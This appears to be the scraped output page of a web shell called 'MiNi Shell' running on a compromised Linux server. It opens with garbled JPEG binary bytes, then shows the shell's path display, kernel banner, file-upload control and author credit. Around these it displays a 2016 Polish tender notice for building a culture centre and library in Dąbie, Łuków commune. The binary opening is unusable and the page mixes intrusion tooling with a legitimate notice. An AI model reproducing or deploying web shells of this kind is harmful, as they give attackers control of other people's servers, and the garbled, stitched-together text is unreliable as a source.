JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/56831-N-2016.html

<p class="kh_header"><b>Łuków: Budowa Centrum Kultury w Dąbiu</b><br>
<b>Numer ogłoszenia: 56831 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminna Biblioteka Publiczna w Łukowie , Ul. Świderska 12, 21-400 Łuków, woj. lubelskie, tel. 509252503, faks 25 798 24 39.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Centrum Kultury w Dąbiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1.Budowa Centrum Kultury w Dąbiu- wolnostojący parterowego budynku mieszczącego  Bibliotekę Publiczną z pomieszczeniami wypożyczalni, czytelni, salą widowiskowo - wystawową, zapleczem biurowo - magazynowym, sanitarno - socjalnym i technicznym. Wyposażenie pomieszczeń biblioteki w regały, stoliki, krzesła oraz urządzenia multimedialne. Infrastruktura towarzysząca - przyłącze wodociągowe, pompa ciepła i zbiornik na ścieki o poj. 6 m3.  
Zakres robót :
- roboty rozbiórkowe
- roboty ziemne, fundamenty
- ściany konstrukcyjne
- kominy i wentylacja
- stropy, wieńce, podciągi
- konstrukcja i pokrycie dachu
- podłogi i posadzki
- ścianki działowe
- stolarka okienna i drzwiowa
- tynki, wykładziny ścian
- roboty malarskie
-  elewacje
- pochylnia
- elementy ślusarskie
- instalacje elektryczne i sanitarne
- utwardzenie - opaska, dojścia i dojazdy
- wyposażenie

2. Budowa budynku garażowego wraz z pomieszczeniami towarzyszącymi.
Zakres robót:
- roboty ziemne, fundamenty
- ściany konstrukcyjne
- kominy i wentylacja
- stropy, wieńce, podciągi
- konstrukcja i pokrycie dachu
- podłogi i posadzki
- ścianki działowe
- stolarka okienna i drzwiowa
- tynki, wykładziny ścian
- roboty malarskie
-  elewacje
- pochylnia
- elementy ślusarskie
- instalacje elektryczne i sanitarne

Budynek zlokalizowany na działkach oznaczonych numerem 1479/4 i 1479/5 w miejscowości Dąbie, Gmina Łuków.  

Powierzchnia zabudowy: 379,87 m2, powierzchnia użytkowa: 333,22 m2, kubatura: 1707,31 m3 . Integralną częścią SIWZ jest załączone pozwolenie na budowę, projekty budowlane, przedmiary oraz STWiOR. 
Zakres robót obejmuje również obsługę geodezyjną inwestycji, sporządzenie inwentaryzacji geodezyjnej powykonawczej dla wykonanych robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.20.00.00-9, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za  spełnienie  warunku  posiadania  niezbędnej  wiedzy  i  doświadczenia  Zamawiający  uzna  wykonanie co najmniej trzech robót budowlanych w zakresie budowy obiektów użyteczności publicznej zrealizowane  w ciągu ostatnich 5 lat przed upływem terminu składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w tym  okresie, o łącznej wartości nie mniejszej niż  1 500 000 zł.Ocena spełniania warunków odbywać  się  będzie  na  zasadzie  spełnia/nie  spełnia  na  podstawie  oświadczenia  oraz  przedłożonych  wraz z ofertą dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna wykazanie się przez wykonawcę dysponowaniem jedną osobą  posiadającą  odpowiednie  kwalifikacje,  pozwalające  na  objęcie  obowiązków  kierownika budowy,  posiadającego  co  najmniej  2-letnią  praktykę  zawodową  na  budowie,  która  będzie  wykonywać   swoje  obowiązki osobiście,  wraz  z  informacjami  na  temat  jej  wykształcenia,  doświadczenia  i kwalifikacji zawodowych, oraz informacją o podstawie do dysponowania tą osobą, wg załącznika nr 5. Ocena spełniania warunków odbywać  się  będzie  na  zasadzie  spełnia/nie  spełnia  na  podstawie  oświadczenia  oraz  przedłożonych  wraz z ofertą dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  Zamawiający  uzna  przedstawienie  przez  Wykonawcę  dokumentu  potwierdzającego, że wykonawca posiada środki pieniężne lub zdolność  kredytową w wysokości 1 500 000 zł. Wykonawcy wspólnie  ubiegający  się  o udzielenie  niniejszego  zamówienia  muszą  wykazać,  że  łącznie  spełniają powyższy warunek. Ocena spełniania warunków odbywać  się  będzie  na  zasadzie  spełnia/nie  spełnia  na  podstawie  oświadczenia  oraz  przedłożonych  wraz z ofertą dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - okres gwarancji - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:

Zmianie może ulec termin realizacji przedmiotu umowy, w przypadku: 
a) 	wystąpienia  robót   dodatkowych,  od  wykonania  których  uzależnione  jest  wykonanie zamówienia podstawowego, 
b) 	wystąpienia konieczności wykonania robót zamiennych, wstrzymujących lub opóźniających realizację robót będących przedmiotem umowy, 
c) 	wystąpienia  wad  dokumentacji  projektowej  skutkującej  koniecznością  dokonania  poprawek  lub uzupełnień,  jeżeli  uniemożliwia  to  lub  wstrzymuje  realizację  określonego  rodzaju  robót  mających wpływ na termin wykonania umowy, 
d)  	wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia, 
e)  	zmiany ilości jednostek przedmiarowych robót objętych umową, 
f)  	konieczności  zrealizowania  jakiejkolwiek  części  robót,  objętych  przedmiotem  umowy,  przy zastosowaniu  odmiennych  rozwiązań  technicznych  lub  technologicznych,  niż  wskazane w  dokumentacji  projektowej,  a  wynikających  ze  stwierdzonych  wad  tej  dokumentacji  lub  zmiany stanu prawnego w oparciu, o który je przygotowano,  gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu umowy, 
g)  	przestojów  spowodowanych  koniecznością  usuwania  nieumyślnych  uszkodzeń  istniejących urządzeń, nieoznaczonych w dokumentacji projektowej, 
h) 	wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy stron umowy, 
i)  	niemożności  wykonywania  robót,  gdy  obowiązujące  przepisy  nie  dopuszczają  do  wykonania  robót lub nakazują wstrzymanie robót z przyczyn niezawinionych przez Wykonawcę, 
j)  	wystąpienia  opóźnienia  w  dokonaniu  określonych  czynności  lub  ich  zaniechania  przez  właściwe organy  administracji  państwowej,  które  nie  są  następstwem  okoliczności,  za  które  Wykonawca ponosi odpowiedzialność, 
k) zaistnienia  innych  okoliczności  prawnych,  ekonomicznych  lub  technicznych,  skutkujących niemożliwością wykonania lub należytego wykonania umowy zgodnie z jej postanowieniami, 
l)  	wystąpienia  zdarzenia  losowego  mającego  charakter  siły  wyższej  uniemożliwiającej  wykonanie przedmiotu umowy zgodnie z jej postanowieniami, 
m)	w przypadku wystąpienia którejkolwiek z w/w okoliczności termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności, tj. o okres opóźniający lub wstrzymujący  realizację  zamówienia  potwierdzony  przez  Zamawiającego  lub  inspektora  nadzoru inwestorskiego.

5.  Dopuszcza  się  wykonanie  robót  zamiennych  w  miejsce  robót  wynikających  z  oferty  Wykonawcy w sytuacji gdy zajdzie co najmniej jeden z nw. przypadków: 
1) 	roboty zamienne zapewnią lepsze rozwiązanie techniczne niż roboty wynikające z oferty Wykonawcy, 
2)  	roboty zamienne dadzą ten sam efekt techniczny co roboty wynikające z oferty Wykonawcy, jednocześnie przy niższych kosztach wykonania robót zamiennych, 
3)	roboty zamienne są korzystniejsze dla Zamawiającego niż roboty wynikające z oferty Wykonawcy, 
4)  	pomimo  zachowania  należytej  staranności  przez  Zamawiającego  przy  opisywaniu  przedmiotu  umowy zajdą  okoliczności,  których  nie  można  było  wcześniej  przewidzieć  i  których  następstwa  wymagają wykonania robót zamiennych, 
5)  	w toku realizacji umowy zostanie wydana decyzja organu administracji publicznej w wyniku, której zajdzie konieczność wykonania robót zamiennych, a roboty z  wynikające z oferty Wykonawcy staną się zbędne do wykonania. 

6.  Dopuszcza się zmianę osób sprawujących funkcje na budowie, o których mowa w umowie w następujących przypadkach: 
1)  	niewywiązywania się z obowiązków wynikających z umowy, 
2)  	jeżeli  zmiana  tych  osób  stanie  się  konieczna  z  jakichkolwiek  innych  przyczyn  niezależnych od Wykonawcy. 

7.  	Termin zakończenia prac określony w umowie może ulec skróceniu za zgodą Stron. 

8.  	Dopuszcza się zmianę warunków płatności za zgodą Stron. 

9. 	Dopuszcza się zmiany stawki podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów. 

10.	Dopuszcza  się  po  akceptacji  Zamawiającego,  zmianę  technologii  wykonywania  robót  budowlanych  pod warunkiem  osiągnięcia  tego  samego  celu.  Koszt  realizacji  robót  wg  zamiennej  technologii  nie  może  być większy od kosztu robót przewidzianych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukow.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminna Biblioteka Publiczna w Łukowie, ul. Świderska 12, 21-400 Łuków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2016 godzina 09:00, miejsce: Gminna Biblioteka Publiczna w Łukowie, ul. Świderska 12, 21-400 Łuków, pok. 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com